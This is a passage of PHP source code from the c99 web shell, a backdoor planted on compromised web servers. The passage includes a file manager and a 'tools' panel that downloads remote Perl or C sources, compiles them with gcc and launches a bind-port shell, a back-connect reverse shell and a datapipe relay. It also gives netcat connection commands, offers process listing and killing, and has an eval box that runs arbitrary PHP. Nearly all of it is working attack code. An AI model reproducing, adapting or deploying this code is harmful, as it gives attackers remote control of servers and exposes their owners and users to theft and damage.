1988        $r[1] = round($r[1]); 
1989        $isdir = is_dir($v); 
1990        if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
1991        { 
1992         if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
1993         $disppath = $r[2].$disppath.$r[3]; 
1994         if ($r[4]) {break;} 
1995        } 
1996       } 
1997      } 
1998     } 
1999     $uo = urlencode($o); 
2000     $ud = urlencode($dir); 
2001     $uv = urlencode($v); 
2002     $row = array(); 
2003     if ($o == ".") 
2004     { 
2005      $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
2006      $row[] = "LINK"; 
2007     } 
2008     elseif ($o == "..") 
2009     { 
2010      $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
2011      $row[] = "LINK"; 
2012     } 
2013     elseif (is_dir($v)) 
2014     { 
2015      if (is_link($v)) 
2016      { 
2017       $disppath .= " => ".readlink($v); 
2018       $type = "LINK"; 
2019       $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
2020      } 
2021      else 
2022      { 
2023       $type = "DIR"; 
2024       $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
2025       } 
2026      $row[] = $type; 
2027     } 
2028     elseif(is_file($v)) 
2029     { 
2030      $ext = explode(".",$o); 
2031      $c = count($ext)-1; 
2032      $ext = $ext[$c]; 
2033      $ext = strtolower($ext); 
2034      $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
2035      $row[] = view_size($a[1]); 
2036     } 
2037     $row[] = date("d.m.Y H:i:s",$a[2]); 
2038     if (!$win) {$row[] = $a[3];} 
2039     $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
2040     if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
2041     else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
2042     if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
2043     else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
2044     if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
2045     elseif (is_link($v)) {$tab["links"][] = $row;} 
2046     elseif (is_dir($v)) {$tab["folders"][] = $row;} 
2047     elseif (is_file($v)) {$tab["files"][] = $row;} 
2048     $i++; 
2049    } 
2050   } 
2051   // Compiling table 
2052   $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
2053   echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; 
2054   foreach($table as $row) 
2055   { 
2056    echo "<tr>\r\n"; 
2057    foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
2058    echo "</tr>\r\n"; 
2059   } 
2060   echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
2061   <script> 
2062   function ls_setcheckboxall(status) 
2063   { 
2064    var id = 1; 
2065    var num = ".(count($table)-2)."; 
2066    while (id <= num) 
2067    { 
2068     document.getElementById('actbox'+id).checked = status; 
2069     id++; 
2070    } 
2071   } 
2072   function ls_reverse_all() 
2073   { 
2074    var id = 1; 
2075    var num = ".(count($table)-2)."; 
2076    while (id <= num) 
2077    { 
2078     document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
2079     id++; 
2080    } 
2081   } 
2082   </script> 
2083   <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
2084   <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
2085   if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
2086   { 
2087    echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
2088   } 
2089   echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
2090   echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
2091   echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
2092   if ($usefsbuff) 
2093   { 
2094    echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
2095    echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
2096    echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; 
2097   } 
2098   echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; 
2099   echo "</form>"; 
2100 } 
2101 } 
2102 if ($act == "tools") 
2103 { 
2104 $bndportsrcs = array( 
2105   "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), 
2106   "c99sh_bindport.c"=>array("Using C","%path %port %pass") 
2107 ); 
2108 $bcsrcs = array( 
2109   "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), 
2110   "c99sh_backconn.c"=>array("Using C","%path %host %port") 
2111 ); 
2112 $dpsrcs = array( 
2113   "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), 
2114   "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") 
2115 ); 
2116 if (!is_array($bind)) {$bind = array();} 
2117 if (!is_array($bc)) {$bc = array();} 
2118 if (!is_array($datapipe)) {$datapipe = array();} 
2119 if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} 
2120 if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} 
2121    
2122 if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} 
2123 if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} 
2124 if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} 
2125 if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} 
2126 if (!empty($bindsubmit)) 
2127 { 
2128   echo "<b>Result of binding port:</b><br>"; 
2129   $v = $bndportsrcs[$bind["src"]]; 
2130   if (empty($v)) {echo "Unknown file!<br>";} 
2131   elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} 
2132   else 
2133   { 
2134    $w = explode(".",$bind["src"]); 
2135    $ext = $w[count($w)-1]; 
2136    unset($w[count($w)-1]); 
2137    $srcpath = join(".",$w).".".rand(0,999).".".$ext; 
2138    $binpath = $tmpdir.join(".",$w).rand(0,999); 
2139    if ($ext == "pl") {$binpath = $srcpath;} 
2140    @unlink($srcpath); 
2141    $fp = fopen($srcpath,"ab+"); 
2142    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} 
2143    elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} 
2144    else 
2145    { 
2146     fwrite($fp,$data,strlen($data)); 
2147     fclose($fp); 
2148     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);} 
2149     $v[1] = str_replace("%path",$binpath,$v[1]); 
2150     $v[1] = str_replace("%port",$bind["port"],$v[1]); 
2151     $v[1] = str_replace("%pass",$bind["pass"],$v[1]); 
2152     $v[1] = str_replace("//","/",$v[1]); 
2153     $retbind = myshellexec($v[1]." > /dev/null &"); 
2154     sleep(5); 
2155     $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); 
2156     if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} 
2157     else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";} 
2158    } 
2159    echo "<br>"; 
2160   } 
2161 } 
2162 if (!empty($bcsubmit)) 
2163 { 
2164   echo "<b>Result of back connection:</b><br>"; 
2165   $v = $bcsrcs[$bc["src"]]; 
2166   if (empty($v)) {echo "Unknown file!<br>";} 
2167   else 
2168   { 
2169    $w = explode(".",$bc["src"]); 
2170    $ext = $w[count($w)-1]; 
2171    unset($w[count($w)-1]); 
2172    $srcpath = join(".",$w).".".rand(0,999).".".$ext; 
2173    $binpath = $tmpdir.join(".",$w).rand(0,999); 
2174    if ($ext == "pl") {$binpath = $srcpath;} 
2175    @unlink($srcpath); 
2176    $fp = fopen($srcpath,"ab+"); 
2177    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} 
2178    elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} 
2179    else 
2180    { 
2181     fwrite($fp,$data,strlen($data)); 
2182     fclose($fp); 
2183     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} 
2184     $v[1] = str_replace("%path",$binpath,$v[1]); 
2185     $v[1] = str_replace("%host",$bc["host"],$v[1]); 
2186     $v[1] = str_replace("%port",$bc["port"],$v[1]); 
2187     $v[1] = str_replace("//","/",$v[1]); 
2188     $retbind = myshellexec($v[1]." > /dev/null &"); 
2189     echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>"; 
2190    } 
2191   } 
2192 } 
2193 if (!empty($dpsubmit)) 
2194 { 
2195   echo "<b>Result of datapipe-running:</b><br>"; 
2196   $v = $dpsrcs[$datapipe["src"]]; 
2197   if (empty($v)) {echo "Unknown file!<br>";} 
2198   elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} 
2199   else 
2200   { 
2201    $srcpath = $tmpdir.$datapipe["src"]; 
2202    $w = explode(".",$datapipe["src"]); 
2203    $ext = $w[count($w)-1]; 
2204    unset($w[count($w)-1]); 
2205    $srcpath = join(".",$w).".".rand(0,999).".".$ext; 
2206    $binpath = $tmpdir.join(".",$w).rand(0,999); 
2207    if ($ext == "pl") {$binpath = $srcpath;} 
2208    @unlink($srcpath); 
2209    $fp = fopen($srcpath,"ab+"); 
2210    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} 
2211    elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} 
2212    else 
2213    { 
2214     fwrite($fp,$data,strlen($data)); 
2215     fclose($fp); 
2216     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} 
2217     list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); 
2218     $v[1] = str_replace("%path",$binpath,$v[1]); 
2219     $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); 
2220     $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); 
2221     $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); 
2222     $v[1] = str_replace("//","/",$v[1]); 
2223     $retbind = myshellexec($v[1]." > /dev/null &"); 
2224     sleep(5); 
2225     $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); 
2226     if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} 
2227     else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";} 
2228    } 
2229    echo "<br>"; 
2230   } 
2231 } 
2232 ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php 
2233 foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";} 
2234 ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form> 
2235 <b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php 
2236 foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} 
2237 ?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form> 
2238 Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> 
2239 <b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php 
2240 foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} 
2241 ?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php 
2242 } 
2243 if ($act == "processes") 
2244 { 
2245 echo "<b>Processes:</b><br>"; 
2246 if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
2247 else {$handler = "tasklist";} 
2248 $ret = myshellexec($handler); 
2249 if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
2250 else 
2251 { 
2252   if (empty($processes_sort)) {$processes_sort = $sort_default;} 
2253   $parsesort = parsesort($processes_sort); 
2254   if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
2255   $k = $parsesort[0]; 
2256   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
2257   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
2258   $ret = htmlspecialchars($ret); 
2259   if (!$win) 
2260   { 
2261    if ($pid) 
2262    { 
2263     if (is_null($sig)) {$sig = 9;} 
2264     echo "Sending signal ".$sig." to #".$pid."... "; 
2265     if (posix_kill($pid,$sig)) {echo "OK.";} 
2266     else {echo "ERROR.";} 
2267    } 
2268    while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
2269    $stack = explode("\n",$ret); 
2270    $head = explode(" ",$stack[0]); 
2271    unset($stack[0]); 
2272    for($i=0;$i<count($head);$i++) 
2273    { 
2274     if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
2275    } 
2276    $prcs = array(); 
2277    foreach ($stack as $line) 
2278    { 
2279     if (!empty($line)) 
2280 { 
2281 echo "<tr>"; 
2282      $line = explode(" ",$line); 
2283      $line[10] = join(" ",array_slice($line,10)); 
2284      $line = array_slice($line,0,11); 
2285      if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
2286      $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
2287      $prcs[] = $line; 
2288      echo "</tr>"; 
2289     } 
2290    } 
2291   } 
2292   else 
2293   { 
2294    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
2295    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
2296    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
2297    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
2298    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
2299    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
2300    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
2301    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
2302    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
2303    while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
2304    while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
2305    $ret = convert_cyr_string($ret,"d","w"); 
2306    $stack = explode("\n",$ret); 
2307    unset($stack[0],$stack[2]); 
2308    $stack = array_values($stack); 
2309    $head = explode("",$stack[0]); 
2310    $head[1] = explode(" ",$head[1]); 
2311    $head[1] = $head[1][0]; 
2312    $stack = array_slice($stack,1); 
2313    unset($head[2]); 
2314    $head = array_values($head); 
2315    if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
2316    else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
2317    if ($k > count($head)) {$k = count($head)-1;} 
2318    for($i=0;$i<count($head);$i++) 
2319    { 
2320     if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
2321    } 
2322    $prcs = array(); 
2323    foreach ($stack as $line) 
2324    { 
2325     if (!empty($line)) 
2326     { 
2327      echo "<tr>"; 
2328      $line = explode("",$line); 
2329      $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
2330      $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
2331      $prcs[] = $line; 
2332      echo "</tr>"; 
2333     } 
2334    } 
2335   } 
2336   $head[$k] = "<b>".$head[$k]."</b>".$y; 
2337   $v = $processes_sort[0]; 
2338   usort($prcs,"tabsort"); 
2339   if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
2340   $tab = array(); 
2341   $tab[] = $head; 
2342   $tab = array_merge($tab,$prcs); 
2343   echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
2344   foreach($tab as $i=>$k) 
2345   { 
2346    echo "<tr>"; 
2347    foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
2348    echo "</tr>"; 
2349   } 
2350   echo "</table>"; 
2351 } 
2352 } 
2353 if ($act == "eval") 
2354 { 
2355 if (!empty($eval)) 
2356 { 
2357   echo "<b>Result of execution this PHP-code</b>:<br>"; 
2358   $tmp = ob_get_contents(); 
2359   $olddir = realpath("."); 
2360   @chdir($d); 
2361   if ($tmp) 
2362   { 
2363    ob_clean(); 
2364    eval($eval); 
2365    $ret = ob_get_contents(); 
2366    $ret = convert_cyr_string($ret,"d","w"); 
2367    ob_clean(); 
2368    echo $tmp; 
2369    if ($eval_txt) 
2370    { 
2371     $rows = count(explode("\r\n",$ret))+1; 
2372     if ($rows < 10) {$rows = 10;} 
2373     echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
2374    } 
2375    else {echo $ret."<br>";} 
2376   } 
2377   else 
2378   { 
2379    if ($eval_txt) 
2380    { 
2381     echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
2382     eval($eval); 
2383     echo "</textarea>"; 
2384    } 
2385    else {echo $ret;} 
2386   } 
2387   @chdir($olddir); 
2388 } 
2389 else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
2390 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
2391 } 
2392 if ($act == "f") 
2393 { 
2394 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
2395 { 
2396   if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
2397   else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
2398 } 
2399 else 
2400 { 
2401   $r = @file_get_contents($d.$f); 
2402   $ext = explode(".",$f); 
2403   $c = count($ext)-1; 
2404   $ext = $ext[$c]; 
2405   $ext = strtolower($ext); 
2406   $rft = ""; 
2407   foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
2408   if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
2409   if (empty($ft)) {$ft = $rft;} 
2410   $arr = array( 
2411    array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
2412    array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
2413    array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
2414    array("Code","code"), 
2415    array("Session","phpsess"), 
2416    array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
2417    array("SDB","sdb"), 
2418    array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
2419    array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
2420    array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
2421    array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
2422    array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
2423   ); 
2424   echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
2425   foreach($arr as $t) 
2426   { 
2427    if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
2428    elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
2429    else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
2430    echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
2431   } 
2432   echo "<hr size=\"1\" noshade>"; 
2433   if ($ft == "info") 
2434   { 
2435    echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
2436    if (!$win) 
2437    { 
2438     echo "<tr><td><b>Owner/Group</b></td><td> ";     
2439     $ow = posix_getpwuid(fileowner($d.$f)); 
2440     $gr = posix_getgrgid(filegroup($d.$f)); 
2441     echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
2442    } 
2443    echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
2444    $fi = fopen($d.$f,"rb"); 
2445    if ($fi) 
2446    { 
2447     if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
2448     else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
2449     $n = 0; 
2450     $a0 = "00000000<br>"; 
2451     $a1 = ""; 
2452     $a2 = ""; 
2453     for ($i=0; $i<strlen($str); $i++) 
2454     { 
2455      $a1 .= sprintf("%02X",ord($str[$i]))." "; 
2456      switch (ord($str[$i])) 
2457      { 
2458       case 0:  $a2 .= "<font>0</font>"; break; 
2459       case 32: 
2460       case 10: 
2461       case 13: $a2 .= "&nbsp;"; break; 
2462       default: $a2 .= htmlspecialchars($str[$i]); 
2463      } 
2464      $n++; 
2465      if ($n == $hexdump_rows) 
2466      { 
2467       $n = 0; 
2468       if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
2469       $a1 .= "<br>"; 
2470       $a2 .= "<br>"; 
2471      } 
2472     } 
2473     //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
2474     echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
2475    } 
2476    $encoded = ""; 
2477    if ($base64 == 1) 
2478    { 
2479     echo "<b>Base64 Encode</b><br>"; 
2480     $encoded = base64_encode(file_get_contents($d.$f)); 
2481    } 
2482    elseif($base64 == 2) 
2483    { 
2484     echo "<b>Base64 Encode + Chunk</b><br>"; 
2485     $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
2486    } 
2487    elseif($base64 == 3) 
2488    { 
2489     echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
2490     $encoded = base64_encode(file_get_contents($d.$f)); 
2491     $encoded = substr(preg_replace("!.{1,76}!","'\&#92;&#48;'.\n",$encoded),0,-2); 
2492    } 
2493    elseif($base64 == 4) 
2494    { 
2495     $text = file_get_contents($d.$f); 
2496     $encoded = base64_decode($text); 
2497     echo "<b>Base64 Decode"; 
2498     if (base64_encode($encoded) != $text) {echo " (failed)";} 
2499     echo "</b><br>"; 
2500    } 
2501    if (!empty($encoded)) 
2502    { 
2503     echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
2504    } 
2505    echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
